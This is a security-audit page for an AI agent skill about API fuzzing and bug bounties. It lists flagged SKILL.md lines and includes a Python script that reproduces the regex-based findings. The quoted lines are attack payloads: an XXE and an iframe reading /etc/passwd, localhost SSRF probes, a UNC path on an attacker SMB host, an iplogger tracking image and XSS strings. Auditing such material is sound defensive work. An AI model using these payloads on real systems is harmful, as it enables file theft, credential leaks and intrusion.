api-fuzzing-bug-bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing for REST, SOAP, and GraphQL APIs.

Security score: 53/100

The api-fuzzing-bug-bounty skill was audited on Mar 9, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Security Issues

medium, line 419: Curl to non-GitHub URL
Source: SKILL.md
    curl -X POST https://target.com/graphql \

high, line 140: Access to /etc/passwd
Source: SKILL.md
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

high, line 297: Access to /etc/passwd
Source: SKILL.md
    <iframe src="file:///etc/passwd" height=1000 width=800>

low, line 59: External URL reference
Source: SKILL.md
    kr scan https://target.com -w routes-large.kite

low, line 146: External URL reference
Source: SKILL.md
    <object data="http://127.0.0.1:8443"/>

low, line 147: External URL reference
Source: SKILL.md
    <img src="http://127.0.0.1:445"/>

low, line 155: External URL reference
Source: SKILL.md
    https://example.org/download?filename=a.png

low, line 156: External URL reference
Source: SKILL.md
    https://example.org/download?filename=C:\inetpub\wwwroot\web.config

low, line 157: External URL reference
Source: SKILL.md
    https://example.org/download?filename=\\smb.dns.attacker.com\a.png

low, line 251: External URL reference
Source: SKILL.md
    http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

low, line 254: External URL reference
Source: SKILL.md
    http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E

low, line 300: External URL reference
Source: SKILL.md
    <object data="http://127.0.0.1:8443"/>

low, line 303: External URL reference
Source: SKILL.md
    <img src="http://127.0.0.1:445"/>

low, line 306: External URL reference
Source: SKILL.md
    <img src="https://iplogger.com/yourcode.gif"/>

low, line 419: External URL reference
Source: SKILL.md
    curl -X POST https://target.com/graphql \
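The findings above are the kind a text-pattern scanner produces. As an added illustration (not the auditor's scanner and not code from the skill), the Python below applies three rules whose titles and severities are inferred from this report and runs them over the SKILL.md lines quoted in the findings, reproducing the 15 issues, 3 categories and 2 high-severity count. The rule set, the treatment of github.com and its subdomains as "GitHub", and the sample input keyed by SKILL.md line number are all assumptions made for the example.

```python
"""Pattern-based scan of SKILL.md lines, reproducing the report's findings.

Added illustration only: the three rules and their severities are inferred
from the report on this page; they are not the auditor's real ruleset.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: the SKILL.md lines quoted in the findings, keyed by
# their line number in that file (only the flagged lines are reproduced).
SKILL_MD_LINES = {
    59: r'kr scan https://target.com -w routes-large.kite',
    140: r'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>',
    146: r'<object data="http://127.0.0.1:8443"/>',
    147: r'<img src="http://127.0.0.1:445"/>',
    155: r'https://example.org/download?filename=a.png',
    156: r'https://example.org/download?filename=C:\inetpub\wwwroot\web.config',
    157: r'https://example.org/download?filename=\\smb.dns.attacker.com\a.png',
    251: r'http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}',
    254: r"http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E",
    297: r'<iframe src="file:///etc/passwd" height=1000 width=800>',
    300: r'<object data="http://127.0.0.1:8443"/>',
    303: r'<img src="http://127.0.0.1:445"/>',
    306: r'<img src="https://iplogger.com/yourcode.gif"/>',
    419: 'curl -X POST https://target.com/graphql \\',   # line ends in a backslash
}

# Host part of any http(s) URL; stops at '/', whitespace, quotes, tag delimiters or '\'.
URL_HOST_RE = re.compile(r'https?://([^/\s"\'<>\\]+)')
PASSWD_RE = re.compile(r'/etc/passwd')
CURL_RE = re.compile(r'\bcurl\b')

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


@dataclass(frozen=True)
class Finding:
    severity: str
    line: int
    title: str
    source: str


def is_github_host(host: str) -> bool:
    """Assumption: only github.com and its subdomains count as 'GitHub'."""
    host = host.rsplit(":", 1)[0].lower()   # drop any :port suffix
    return host == "github.com" or host.endswith(".github.com")


def scan_line(lineno: int, text: str) -> list[Finding]:
    """Apply the three inferred rules to one line; one line can match several."""
    found = []
    if PASSWD_RE.search(text):
        found.append(Finding("high", lineno, "Access to /etc/passwd", text))
    hosts = URL_HOST_RE.findall(text)
    if CURL_RE.search(text) and any(not is_github_host(h) for h in hosts):
        found.append(Finding("medium", lineno, "Curl to non-GitHub URL", text))
    if hosts:
        found.append(Finding("low", lineno, "External URL reference", text))
    return found


def scan(lines: dict[int, str]) -> list[Finding]:
    """Scan every line; order results by severity, then by line number."""
    findings = [f for n, t in sorted(lines.items()) for f in scan_line(n, t)]
    return sorted(findings, key=lambda f: (SEVERITY_RANK[f.severity], f.line))


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Per-severity counts, e.g. {'high': 2, 'medium': 1, 'low': 12}."""
    return dict(Counter(f.severity for f in findings))


def format_report(findings: list[Finding]) -> str:
    """Render findings in the same shape as the report above."""
    counts = summarize(findings)
    header = (f"{len(findings)} issues across {len({f.title for f in findings})} "
              f"categories, {counts.get('high', 0)} high-severity")
    body = [f"{f.severity} line {f.line}: {f.title}\n    {f.source}" for f in findings]
    return "\n".join([header, *body])


if __name__ == "__main__":
    print(format_report(scan(SKILL_MD_LINES)))
```

Because these rules match text rather than behaviour, an XXE or SSRF payload quoted in a pentesting cheat sheet produces the same finding as a command the skill would actually execute, and line 419 is counted twice (once per rule). That is why a report like this asks the reader to look at each flagged line in its SKILL.md context before installing rather than acting on the score alone.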
Scanned on Mar 9, 2026